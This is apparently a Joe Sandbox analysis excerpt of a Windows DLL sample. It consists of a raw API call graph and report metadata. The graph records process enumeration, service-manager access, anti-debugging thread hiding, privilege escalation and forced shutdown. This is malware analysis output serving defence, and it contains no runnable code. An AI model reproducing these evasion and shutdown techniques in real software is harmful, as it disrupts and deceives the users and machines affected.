18 API calls 100392->100394 100396 6cc2b979 CloseHandle 100393->100396 100395 6cc2b964 100394->100395 100397 6cc315a2 __wsopen_s 18 API calls 100395->100397 100396->100389 100398 6cc2b985 GetLastError 100396->100398 100397->100391 100398->100389 100399->100305 100400->100319 100401->100325 100402->100326 100403->100203 100405 6cc20ba9 100404->100405 100406 6cc20bbe 100404->100406 100442 6cc20120 18 API calls __wsopen_s 100405->100442 100416 6cc20bb9 100406->100416 100420 6cc20cb9 100406->100420 100413 6cc20be1 100435 6cc2b898 100413->100435 100415 6cc20be7 100415->100416 100443 6cc247bb HeapFree GetLastError _free 100415->100443 100416->100206 100418->100201 100419->100201 100421 6cc20cd1 100420->100421 100425 6cc20bd3 100420->100425 100422 6cc29c60 18 API calls 100421->100422 100421->100425 100423 6cc20cef 100422->100423 100444 6cc2bb6c 100423->100444 100426 6cc2873e 100425->100426 100427 6cc28755 100426->100427 100428 6cc20bdb 100426->100428 100427->100428 100527 6cc247bb HeapFree GetLastError _free 100427->100527 100430 6cc29c60 100428->100430 100431 6cc29c81 100430->100431 100432 6cc29c6c 100430->100432 100431->100413 100528 6cc20120 18 API calls __wsopen_s 100432->100528 100434 6cc29c7c 100434->100413 100436 6cc2b8a9 __dosmaperr 100435->100436 100437 6cc2b8be 100435->100437 100436->100415 100438 6cc2b907 __dosmaperr 100437->100438 100439 6cc2b8e5 100437->100439 100537 6cc20120 18 API calls __wsopen_s 100438->100537 100529 6cc2b9c1 100439->100529 100442->100416 100443->100416 100445 6cc2bb78 __wsopen_s 100444->100445 100446 6cc2bbca 100445->100446 100447 6cc2bc33 __dosmaperr 100445->100447 100452 6cc2bb80 __dosmaperr 100445->100452 100455 6cc31990 EnterCriticalSection 100446->100455 100485 6cc20120 18 API calls __wsopen_s 100447->100485 100449 6cc2bbd0 100451 6cc2bbec __dosmaperr 100449->100451 100456 6cc2bc5e 100449->100456 100484 6cc2bc2b LeaveCriticalSection __wsopen_s 100451->100484 100452->100425 100455->100449 100457 6cc2bc80 100456->100457 100483 6cc2bc9c __dosmaperr 100456->100483 100458 6cc2bcd4 100457->100458 100460 6cc2bc84 __dosmaperr 100457->100460 100459 6cc2bce7 100458->100459 100494 6cc2ac69 20 API calls __wsopen_s 100458->100494 100486 6cc2be40 100459->100486 100493 6cc20120 18 API calls __wsopen_s 100460->100493 100465 6cc2bd3c 100467 6cc2bd50 100465->100467 100468 6cc2bd95 WriteFile 100465->100468 100466 6cc2bcfd 100469 6cc2bd01 100466->100469 100470 6cc2bd26 100466->100470 100473 6cc2bd85 100467->100473 100474 6cc2bd5b 100467->100474 100471 6cc2bdb9 GetLastError 100468->100471 100468->100483 100469->100483 100495 6cc2c25b 6 API calls __wsopen_s 100469->100495 100496 6cc2beb1 43 API calls 5 library calls 100470->100496 100471->100483 100499 6cc2c2c3 7 API calls 2 library calls 100473->100499 100477 6cc2bd60 100474->100477 100478 6cc2bd75 100474->100478 100480 6cc2bd65 100477->100480 100477->100483 100498 6cc2c487 8 API calls 3 library calls 100478->100498 100479 6cc2bd73 100479->100483 100497 6cc2c39e 7 API calls 2 library calls 100480->100497 100483->100451 100484->100452 100485->100452 100487 6cc319e5 __wsopen_s 18 API calls 100486->100487 100488 6cc2be51 100487->100488 100492 6cc2bcf8 100488->100492 100500 6cc249b2 GetLastError 100488->100500 100491 6cc2be8e GetConsoleMode 100491->100492 100492->100465 100492->100466 100493->100483 100494->100459 100495->100483 100496->100483 100497->100479 100498->100479 100499->100479 100501 6cc249cf 100500->100501 100502 6cc249c9 100500->100502 100503 6cc26b62 __Getctype 6 API calls 100501->100503 100507 6cc249d5 SetLastError 100501->100507 100504 6cc26b23 __Getctype 6 API calls 100502->100504 100505 6cc249ed 100503->100505 100504->100501 100506 6cc249f1 100505->100506 100505->100507 100508 6cc271e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 100506->100508 100513 6cc24a63 100507->100513 100514 6cc24a69 100507->100514 100509 6cc249fd 100508->100509 100511 6cc24a05 100509->100511 100512 6cc24a1c 100509->100512 100515 6cc26b62 __Getctype 6 API calls 100511->100515 100517 6cc26b62 __Getctype 6 API calls 100512->100517 100513->100491 100513->100492 100516 6cc20ac9 __Getctype 35 API calls 100514->100516 100518 6cc24a13 100515->100518 100519 6cc24a6e 100516->100519 100520 6cc24a28 100517->100520 100524 6cc247bb _free HeapFree GetLastError 100518->100524 100521 6cc24a2c 100520->100521 100522 6cc24a3d 100520->100522 100523 6cc26b62 __Getctype 6 API calls 100521->100523 100526 6cc247bb _free HeapFree GetLastError 100522->100526 100523->100518 100525 6cc24a19 100524->100525 100525->100507 100526->100525 100527->100428 100528->100434 100530 6cc2b9cd __wsopen_s 100529->100530 100538 6cc31990 EnterCriticalSection 100530->100538 100532 6cc2b9db 100533 6cc2b925 __wsopen_s 21 API calls 100532->100533 100534 6cc2ba08 100532->100534 100533->100534 100539 6cc2ba41 LeaveCriticalSection __wsopen_s 100534->100539 100536 6cc2ba2a 100536->100436 100537->100436 100538->100532 100539->100536 100540->100081 100541->100083 100542->100081 100543->100081 100544->100081 100546 6cae022e 100545->100546 100547 6cab70c4 100546->100547 100552 6cc217db 100546->100552 100547->100093 100549->100095 100550->100097 100551->100099 100553 6cc21806 100552->100553 100554 6cc217e9 100552->100554 100553->100546 100554->100553 100555 6cc217f6 100554->100555 100556 6cc2180a 100554->100556 100568 6cc20120 18 API calls __wsopen_s 100555->100568 100560 6cc21a02 100556->100560 100561 6cc21a0e __wsopen_s 100560->100561 100569 6cc1c5a9 EnterCriticalSection 100561->100569 100563 6cc21a1c 100570 6cc219bf 100563->100570 100567 6cc2183c 100567->100546 100568->100553 100569->100563 100578 6cc285a6 100570->100578 100576 6cc219f9 100577 6cc21a51 LeaveCriticalSection 100576->100577 100577->100567 100579 6cc29c60 18 API calls 100578->100579 100580 6cc285b7 100579->100580 100581 6cc319e5 __wsopen_s 18 API calls 100580->100581 100583 6cc285bd __wsopen_s 100581->100583 100582 6cc219d3 100585 6cc2183e 100582->100585 100583->100582 100595 6cc247bb HeapFree GetLastError _free 100583->100595 100587 6cc21850 100585->100587 100589 6cc2186e 100585->100589 100586 6cc2185e 100596 6cc20120 18 API calls __wsopen_s 100586->100596 100587->100586 100587->100589 100593 6cc21886 _Yarn 100587->100593 100594 6cc28659 62 API calls 100589->100594 100590 6cc20cb9 62 API calls 100590->100593 100591 6cc29c60 18 API calls 100591->100593 100592 6cc2bb6c __wsopen_s 62 API calls 100592->100593 100593->100589 100593->100590 100593->100591 100593->100592 100594->100576 100595->100582 100596->100589 100597 6caaf8a3 100598 6caaf887 100597->100598 100599 6cab02ac GetCurrentProcess TerminateProcess 100598->100599 100600 6cab02ca 100599->100600 100601 6ca94b53 100602 6cc16a43 std::_Facet_Register 4 API calls 100601->100602 100603 6ca94b5c _Yarn 100602->100603 100604 6cc0aec0 FindFirstFileA 100603->100604 100609 6ca94bae std::ios_base::_Ios_base_dtor 100604->100609 100605 6cab639e 100803 6cc20130 18 API calls 2 library calls 100605->100803 100607 6ca94cff 100608 6ca95164 CreateFileA CloseHandle 100613 6ca951ec 100608->100613 100609->100605 100609->100607 100609->100608 100610 6caa245a _Yarn _strlen 100609->100610 100610->100605 100611 6cc0aec0 FindFirstFileA 100610->100611 100627 6caa2a83 std::ios_base::_Ios_base_dtor 100611->100627 100759 6cc15120 OpenSCManagerA 100613->100759 100615 6ca9fc00 100796 6cc15240 CreateToolhelp32Snapshot 100615->100796 100618 6cc16a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100654 6ca95478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100618->100654 100620 6caa37d0 Sleep 100665 6caa37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100620->100665 100621 6cc0aec0 FindFirstFileA 100621->100654 100622 6cab63b2 100804 6ca915e0 18 API calls std::ios_base::_Ios_base_dtor 100622->100804 100623 6cc15240 4 API calls 100641 6caa053a 100623->100641 100624 6cc15240 4 API calls 100648 6caa12e2 100624->100648 100626 6cab64f8 100627->100605 100763 6cc00390 100627->100763 100628 6ca9ffe3 100628->100623 100633 6caa0abc 100628->100633 100629 6cab6ba0 104 API calls 100629->100654 100630 6cab6e60 32 API calls 100630->100654 100632 6cc15240 4 API calls 100632->100633 100633->100610 100633->100624 100634 6cab7090 77 API calls 100634->100654 100635 6caa211c 100635->100610 100637 6caa241a 100635->100637 100636 6cc15240 4 API calls 100656 6caa1dd9 100636->100656 100640 6cc00390 11 API calls 100637->100640 100638 6cc0aec0 FindFirstFileA 100638->100665 100639 6cade010 67 API calls 100639->100654 100643 6caa244d 100640->100643 100641->100632 100641->100633 100642 6ca96722 100772 6cc11880 25 API calls 4 library calls 100642->100772 100802 6cc15d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100643->100802 100645 6caa2452 Sleep 100645->100610 100646 6ca96162 100647 6caa16ac 100648->100635 100648->100636 100648->100647 100649 6ca9740b 100773 6cc14ff0 CreateProcessA 100649->100773 100651 6cc15240 4 API calls 100651->100635 100652 6cab6ba0 104 API calls 100652->100665 100653 6cab6e60 32 API calls 100653->100665 100654->100605 100654->100615 100654->100618 100654->100621 100654->100629 100654->100630 100654->100634 100654->100639 100654->100642 100654->100646 100655 6cab7090 77 API calls 100655->100665 100656->100635 100656->100651 100657 6cade010 67 API calls 100657->100665 100658 6ca9775a _strlen 100658->100605 100659 6ca97ba9 100658->100659 100660 6ca97b92 100658->100660 100663 6ca97b43 _Yarn 100658->100663 100662 6cc16a43 std::_Facet_Register 4 API calls 100659->100662 100661 6cc16a43 std::_Facet_Register 4 API calls 100660->100661 100661->100663 100662->100663 100664 6cc0aec0 FindFirstFileA 100663->100664 100673 6ca97be7 std::ios_base::_Ios_base_dtor 100664->100673 100665->100605 100665->100638 100665->100652 100665->100653 100665->100655 100665->100657 100666 6cc14ff0 4 API calls 100677 6ca98a07 100666->100677 100667 6ca99d68 100670 6cc16a43 std::_Facet_Register 4 API calls 100667->100670 100668 6ca99d7f 100671 6cc16a43 std::_Facet_Register 4 API calls 100668->100671 100669 6ca9962c _strlen 100669->100605 100669->100667 100669->100668 100672 6ca99d18 _Yarn 100669->100672 100670->100672 100671->100672 100674 6cc0aec0 FindFirstFileA 100672->100674 100673->100605 100673->100666 100673->100669 100675 6ca98387 100673->100675 100681 6ca99dbd std::ios_base::_Ios_base_dtor 100674->100681 100676 6cc14ff0 4 API calls 100685 6ca99120 100676->100685 100677->100676 100678 6cc14ff0 4 API calls 100695 6ca9a215 _strlen 100678->100695 100679 6cc14ff0 4 API calls 100680 6ca99624 100679->100680 100777 6cc15d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100680->100777 100681->100605 100681->100678 100686 6ca9e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100681->100686 100682 6cc16a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100682->100686 100684 6cc0aec0 FindFirstFileA 100684->100686 100685->100679 100686->100605 100686->100682 100686->100684 100687 6ca9f7b1 100686->100687 100688 6ca9ed02 Sleep 100686->100688 100795 6cc15d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100687->100795 100707 6ca9e8c1 100688->100707 100690 6ca9e8dd GetCurrentProcess TerminateProcess 100690->100686 100691 6ca9a9bb 100694 6cc16a43 std::_Facet_Register 4 API calls 100691->100694 100692 6ca9a9a4 100693 6cc16a43 std::_Facet_Register 4 API calls 100692->100693 100702 6ca9a953 _Yarn _strlen 100693->100702 100694->100702 100695->100605 100695->100691 100695->100692 100695->100702 100696 6cc14ff0 4 API calls 100696->100707 100697 6ca9fbb8 100698 6ca9fbe8 ExitWindowsEx Sleep 100697->100698 100698->100615 100699 6ca9f7c0 100699->100697 100700 6ca9b009 100704 6cc16a43 std::_Facet_Register 4 API calls 100700->100704 100701 6ca9aff0 100703 6cc16a43 std::_Facet_Register 4 API calls 100701->100703 100702->100622 100702->100700 100702->100701 100705 6ca9afa0 _Yarn 100702->100705 100703->100705 100704->100705 100778 6cc15960 100705->100778 100707->100686 100707->100690 100707->100696 100708 6ca9b059 std::ios_base::_Ios_base_dtor _strlen 100708->100605 100709 6ca9b42c 100708->100709 100710 6ca9b443 100708->100710 100713 6ca9b3da _Yarn _strlen 100708->100713 100711 6cc16a43 std::_Facet_Register 4 API calls 100709->100711 100712 6cc16a43 std::_Facet_Register 4 API calls 100710->100712 100711->100713 100712->100713 100713->100622 100714 6ca9b79e 100713->100714 100715 6ca9b7b7 100713->100715 100718 6ca9b751 _Yarn 100713->100718 100716 6cc16a43 std::_Facet_Register 4 API calls 100714->100716 100717 6cc16a43 std::_Facet_Register 4 API calls 100715->100717 100716->100718 100717->100718 100719 6cc15960 104 API calls 100718->100719 100720 6ca9b804 std::ios_base::_Ios_base_dtor _strlen 100719->100720 100720->100605 100721 6ca9bc0f 100720->100721 100722 6ca9bc26 100720->100722 100725 6ca9bbbd _Yarn _strlen 100720->100725 100723 6cc16a43 std::_Facet_Register 4 API calls 100721->100723 100724 6cc16a43 std::_Facet_Register 4 API calls 100722->100724 100723->100725 100724->100725 100725->100622 100726 6ca9c08e 100725->100726 100727 6ca9c075 100725->100727 100730 6ca9c028 _Yarn 100725->100730 100729 6cc16a43 std::_Facet_Register 4 API calls 100726->100729 100728 6cc16a43 std::_Facet_Register 4 API calls 100727->100728 100728->100730 100729->100730 100731 6cc15960 104 API calls 100730->100731 100736 6ca9c0db std::ios_base::_Ios_base_dtor _strlen 100731->100736 100732 6ca9c7bc 100735 6cc16a43 std::_Facet_Register 4 API calls 100732->100735 100733 6ca9c7a5 100734 6cc16a43 std::_Facet_Register 4 API calls 100733->100734 100743 6ca9c753 _Yarn _strlen 100734->100743 100735->100743 100736->100605 100736->100732 100736->100733 100736->100743 100737 6ca9d3ed 100739 6cc16a43 std::_Facet_Register 4 API calls 100737->100739 100738 6ca9d406 100740 6cc16a43 std::_Facet_Register 4 API calls 100738->100740 100741 6ca9d39a _Yarn 100739->100741 100740->100741 100742 6cc15960 104 API calls 100741->100742 100744 6ca9d458 std::ios_base::_Ios_base_dtor _strlen 100742->100744 100743->100622 100743->100737 100743->100738 100743->100741 100749 6ca9cb2f 100743->100749 100744->100605 100745 6ca9d8bb 100744->100745 100746 6ca9d8a4 100744->100746 100750 6ca9d852 _Yarn _strlen 100744->100750 100748 6cc16a43 std::_Facet_Register 4 API calls 100745->100748 100747 6cc16a43 std::_Facet_Register 4 API calls 100746->100747 100747->100750 100748->100750 100750->100622 100751 6ca9dccf 100750->100751 100752 6ca9dcb6 100750->100752 100755 6ca9dc69 _Yarn 100750->100755 100754 6cc16a43 std::_Facet_Register 4 API calls 100751->100754 100753 6cc16a43 std::_Facet_Register 4 API calls 100752->100753 100753->100755 100754->100755 100756 6cc15960 104 API calls 100755->100756 100758 6ca9dd1c std::ios_base::_Ios_base_dtor 100756->100758 100757 6cc14ff0 4 API calls 100757->100686 100758->100605 100758->100757 100760 6cc15156 100759->100760 100761 6cc151e8 OpenServiceA 100760->100761 100762 6cc1522f 100760->100762 100761->100760 100762->100654 100769 6cc003a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100763->100769 100764 6cc0310e CloseHandle 100764->100769 100765 6cc03f5f CloseHandle 100765->100769 100766 6caa37cb 100771 6cc15d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100766->100771 100767 6cbec1e0 WriteFile WriteFile WriteFile ReadFile 100767->100769 100768 6cc0251b CloseHandle 100768->100769 100769->100764 100769->100765 100769->100766 100769->100767 100769->100768 100805 6cbeb730 100769->100805 100771->100620 100772->100649 100774 6cc150ca 100773->100774 100775 6cc15080 WaitForSingleObject CloseHandle CloseHandle 100774->100775 100776 6cc150e3 100774->100776 100775->100774 100776->100658 100777->100669 100779 6cc159b7 100778->100779 100816 6cc15ff0 100779->100816 100781 6cc159c8 100782 6cab6ba0 104 API calls 100781->100782 100789 6cc159ec 100782->100789 100783 6cc15a67 100784 6cade010 67 API calls 100783->100784 100785 6cc15a9f std::ios_base::_Ios_base_dtor 100784->100785 100787 6cade010 67 API calls 100785->100787 100790 6cc15ae2 std::ios_base::_Ios_base_dtor 100787->100790 100788 6cc15a54 100853 6cc15b90 100788->100853 100789->100783 100789->100788 100835 6cc16340 100789->100835 100843 6caf2000 100789->100843 100790->100708 100793 6cc15a5c 100794 6cab7090 77 API calls 100793->100794 100794->100783 100795->100699 100798 6cc152a0 std::locale::_Setgloballocale 100796->100798 100797 6cc15320 Process32NextW 100797->100798 100798->100797 100799 6cc15277 CloseHandle 100798->100799 100800 6cc153b1 100798->100800 100801 6cc15345 Process32FirstW 100798->100801 100799->100798 100800->100628 100801->100798 100802->100645 100804->100626 100806 6cbeb743 _Yarn __wsopen_s std::locale::_Setgloballocale 100805->100806 100807 6cbec180 100806->100807 100808 6cbebced CreateFileA 100806->100808 100810 6cbeaa30 100806->100810 100807->100769 100808->100806 100811 6cbeaa43 __wsopen_s std::locale::_Setgloballocale 100810->100811 100812 6cbeb3e9 WriteFile 100811->100812 100813 6cbeb43d WriteFile 100811->100813 100814 6cbeb718 100811->100814 100815 6cbeab95 ReadFile 100811->100815 100812->100811 100813->100811 100814->100806 100815->100811 100817 6cc16025 100816->100817 100818 6cae2020 52 API calls 100817->100818 100819 6cc160c6 100818->100819 100820 6cc16a43 std::_Facet_Register 4 API calls 100819->100820 100821 6cc160fe 100820->100821 100822 6cc17327 43 API calls 100821->100822 100823 6cc16112 100822->100823 100824 6cae1d90 89 API calls 100823->100824 100825 6cc161bb 100824->100825 100826 6cc161ec 100825->100826 100868 6cae2250 30 API calls 100825->100868 100826->100781 100828 6cc16226 100869 6cae26e0 24 API calls 4 library calls 100828->100869 100830 6cc16238 100870 6cc19379 RaiseException 100830->100870 100832 6cc1624d 100833 6cade010 67 API calls 100832->100833 100834 6cc1625f 100833->100834 100834->100781 100836 6cc1638d 100835->100836 100871 6cc165a0 100836->100871 100838 6cc1647c 100838->100789 100841 6cc163a5 100841->100838 100889 6cae2250 30 API calls 100841->100889 100890 6cae26e0 24 API calls 4 library calls 100841->100890 100891 6cc19379 RaiseException 100841->100891 100844 6caf203f 100843->100844 100848 6caf2053 100844->100848 100900 6cae3560 32 API calls std::_Xinvalid_argument 100844->100900 100847 6caf210e 100850 6caf2121 100847->100850 100901 6cae37e0 32 API calls std::_Xinvalid_argument 100847->100901 100848->100847 100902 6cae2250 30 API calls 100848->100902 100903 6cae26e0 24 API calls 4 library calls 100848->100903 100904 6cc19379 RaiseException 100848->100904 100850->100789 100854 6cc15b9e 100853->100854 100858 6cc15bd1 100853->100858 100855 6cae01f0 64 API calls 100854->100855 100857 6cc15bc4 100855->100857 100856 6cc15c83 100856->100793 100859 6cc20b18 67 API calls 100857->100859 100858->100856 100905 6cae2250 30 API calls 100858->100905 100859->100858 100861 6cc15cae 100906 6cae2340 24 API calls 100861->100906 100863 6cc15cbe 100907 6cc19379 RaiseException 100863->100907 100865 6cc15cc9 100866 6cade010 67 API calls 100865->100866 100867 6cc15d22 std::ios_base::_Ios_base_dtor 100866->100867 100867->100793 100868->100828 100869->100830 100870->100832 100872 6cc16608 100871->100872 100873 6cc165dc 100871->100873 100878 6cc16619 100872->100878 100892 6cae3560 32 API calls std::_Xinvalid_argument 100872->100892 100887 6cc16601 100873->100887 100894 6cae2250 30 API calls 100873->100894 100876 6cc167e8 100895 6cae2340 24 API calls 100876->100895 100878->100887 100893 6cae2f60 42 API calls 4 library calls 100878->100893 100879 6cc167f7 100896 6cc19379 RaiseException 100879->100896 100883 6cc16827 100898 6cae2340 24 API calls 100883->100898 100885 6cc1683d 100899 6cc19379 RaiseException 100885->100899 100887->100841 100888 6cc16653 100888->100887 100897 6cae2250 30 API calls 100888->100897 100889->100841 100890->100841 100891->100841 100892->100878 100893->100888 100894->100876 100895->100879 100896->100888 100897->100883 100898->100885 100899->100887 100900->100848 100901->100850 100902->100848 100903->100848 100904->100848 100905->100861 100906->100863 100907->100865 100908 6ca93d62 100909 6ca93bc0 100908->100909 100910 6ca93e8a GetCurrentThread NtSetInformationThread 100909->100910 100911 6ca93eea 100910->100911 100912 6caa4a27 100916 6caa4a5d _strlen 100912->100916 100913 6cab639e 101003 6cc20130 18 API calls 2 library calls 100913->101003 100914 6caa5b58 100917 6cc16a43 std::_Facet_Register 4 API calls 100914->100917 100915 6caa5b6f 100918 6cc16a43 std::_Facet_Register 4 API calls 100915->100918 100916->100913 100916->100914 100916->100915 100920 6caa5b09 _Yarn 100916->100920 100917->100920 100918->100920 100921 6cc0aec0 FindFirstFileA 100920->100921 100923 6caa5bad std::ios_base::_Ios_base_dtor 100921->100923 100922 6cc14ff0 4 API calls 100928 6caa61cb _strlen 100922->100928 100923->100913 100923->100922 100926 6caa9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100923->100926 100924 6cc16a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100924->100926 100925 6cc0aec0 FindFirstFileA 100925->100926 100926->100913 100926->100924 100926->100925 100927 6caaa292 Sleep 100926->100927 100947 6caae619 100926->100947 100945 6caa9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100927->100945 100928->100913 100929 6caa660d 100928->100929 100930 6caa6624 100928->100930 100936 6caa65bc _Yarn _strlen 100928->100936 100931 6cc16a43 std::_Facet_Register 4 API calls 100929->100931 100932 6cc16a43 std::_Facet_Register 4 API calls 100930->100932 100931->100936 100932->100936 100933 6cc14ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100933->100945 100934 6caa9bbd GetCurrentProcess TerminateProcess 100934->100926 100935 6cab63b2 101004 6ca915e0 18 API calls std::ios_base::_Ios_base_dtor 100935->101004 100936->100935 100939 6caa6989 100936->100939 100940 6caa6970 100936->100940 100943 6caa6920 _Yarn 100936->100943 100938 6cab64f8 100942 6cc16a43 std::_Facet_Register 4 API calls 100939->100942 100941 6cc16a43 std::_Facet_Register 4 API calls 100940->100941 100941->100943 100942->100943 100944 6cc15960 104 API calls 100943->100944 100948 6caa69d6 std::ios_base::_Ios_base_dtor _strlen 100944->100948 100945->100913 100945->100926 100945->100933 100945->100934 100945->100935 100954 6cc15960 104 API calls 100945->100954 100964 6cc16a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100945->100964 100946 6caaf243 CreateFileA 100955 6caaf2a7 100946->100955 100947->100946 100948->100913 100949 6caa6dbb 100948->100949 100950 6caa6dd2 100948->100950 100956 6caa6d69 _Yarn _strlen 100948->100956 100953 6cc16a43 std::_Facet_Register 4 API calls 100949->100953 100951 6cc16a43 std::_Facet_Register 4 API calls 100950->100951 100951->100956 100952 6cab02ca 100953->100956 100954->100945 100955->100952 100963 6cab02ac GetCurrentProcess TerminateProcess 100955->100963 100956->100935 100957 6caa7440 100956->100957 100958 6caa7427 100956->100958 100959 6caa73da _Yarn 100956->100959 100961 6cc16a43 std::_Facet_Register 4 API calls 100957->100961 100960 6cc16a43 std::_Facet_Register 4 API calls 100958->100960 100962 6cc15960 104 API calls 100959->100962 100960->100959 100961->100959 100965 6caa748d std::ios_base::_Ios_base_dtor _strlen 100962->100965 100963->100952 100964->100945 100965->100913 100966 6caa79a8 100965->100966 100967 6caa7991 100965->100967 100970 6caa7940 _Yarn _strlen 100965->100970 100969 6cc16a43 std::_Facet_Register 4 API calls 100966->100969 100968 6cc16a43 std::_Facet_Register 4 API calls 100967->100968 100968->100970 100969->100970 100970->100935 100971 6caa7dc9 100970->100971 100972 6caa7de2 100970->100972 100975 6caa7d7c _Yarn 100970->100975 100973 6cc16a43 std::_Facet_Register 4 API calls 100971->100973 100974 6cc16a43 std::_Facet_Register 4 API calls 100972->100974 100973->100975 100974->100975 100976 6cc15960 104 API calls 100975->100976 100977 6caa7e2f std::ios_base::_Ios_base_dtor _strlen 100976->100977 100977->100913 100978 6caa85a8 100977->100978 100979 6caa85bf 100977->100979 100982 6caa8556 _Yarn _strlen 100977->100982 100980 6cc16a43 std::_Facet_Register 4 API calls 100978->100980 100981 6cc16a43 std::_Facet_Register 4 API calls 100979->100981 100980->100982 100981->100982 100982->100935 100983 6caa896a 100982->100983 100984 6caa8983 100982->100984 100987 6caa891d _Yarn 100982->100987 100985 6cc16a43 std::_Facet_Register 4 API calls 100983->100985 100986 6cc16a43 std::_Facet_Register 4 API calls 100984->100986 100985->100987 100986->100987 100988 6cc15960 104 API calls 100987->100988 100991 6caa89d0 std::ios_base::_Ios_base_dtor _strlen 100988->100991 100989 6caa8f1f 100992 6cc16a43 std::_Facet_Register 4 API calls 100989->100992 100990 6caa8f36 100993 6cc16a43 std::_Facet_Register 4 API calls 100990->100993 100991->100913 100991->100989 100991->100990 100996 6caa8ecd _Yarn _strlen 100991->100996 100992->100996 100993->100996 100994 6caa936d 100998 6cc16a43 std::_Facet_Register 4 API calls 100994->100998 100995 6caa9354 100997 6cc16a43 std::_Facet_Register 4 API calls 100995->100997 100996->100935 100996->100994 100996->100995 100999 6caa9307 _Yarn 100996->100999 100997->100999 100998->100999 101000 6cc15960 104 API calls 100999->101000 101002 6caa93ba std::ios_base::_Ios_base_dtor 101000->101002 101001 6cc14ff0 4 API calls 101001->100926 101002->100913 101002->101001 101004->100938 101005 6cc1ef3f 101006 6cc1ef4b __wsopen_s 101005->101006 101007 6cc1ef52 GetLastError ExitThread 101006->101007 101008 6cc1ef5f 101006->101008 101009 6cc249b2 __Getctype 37 API calls 101008->101009 101010 6cc1ef64 101009->101010 101017 6cc29d66 101010->101017 101014 6cc1ef7b 101023 6cc1eeaa 16 API calls 2 library calls 101014->101023 101016 6cc1ef9d 101018 6cc1ef6f 101017->101018 101019 6cc29d78 GetPEB 101017->101019 101018->101014 101022 6cc26d6f 5 API calls std::_Lockit::_Lockit 101018->101022 101019->101018 101020 6cc29d8b 101019->101020 101024 6cc26e18 5 API calls std::_Lockit::_Lockit 101020->101024 101022->101014 101023->101016 101024->101018
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: HR^
                                                            • API String ID: 4218353326-1341859651
                                                            • Opcode ID: 25eaa381f26aae009ba2fc5efd566f687f153ea2f198c137569a5d7afc48331f
                                                            • Instruction ID: e9a74d6918727f85d58499c00c903ee314091fb2bd944947a64731d8cc189a56
                                                            • Opcode Fuzzy Hash: 25eaa381f26aae009ba2fc5efd566f687f153ea2f198c137569a5d7afc48331f
                                                            • Instruction Fuzzy Hash: 0B740571655B018FC728CF28C8D1695B7F3EF85318B1D8A2DC0AA8BB55E774B58ACB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: }jk$;T55$L@^
                                                            • API String ID: 0-4218709813
                                                            • Opcode ID: 974937c35170c0113945411930b502a0a33d86d1832e229d9e10fef827ac2324
                                                            • Instruction ID: f6b2ccc76dfe8444bfe3cc3171289f6a663da5e66d3eaa280233f3bedcb88ca5
                                                            • Opcode Fuzzy Hash: 974937c35170c0113945411930b502a0a33d86d1832e229d9e10fef827ac2324
                                                            • Instruction Fuzzy Hash: AB34F671645B018FC728CF68C8D0696B7E3AF85318B1D8A6DC0968BB55EB35B58BCB40

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
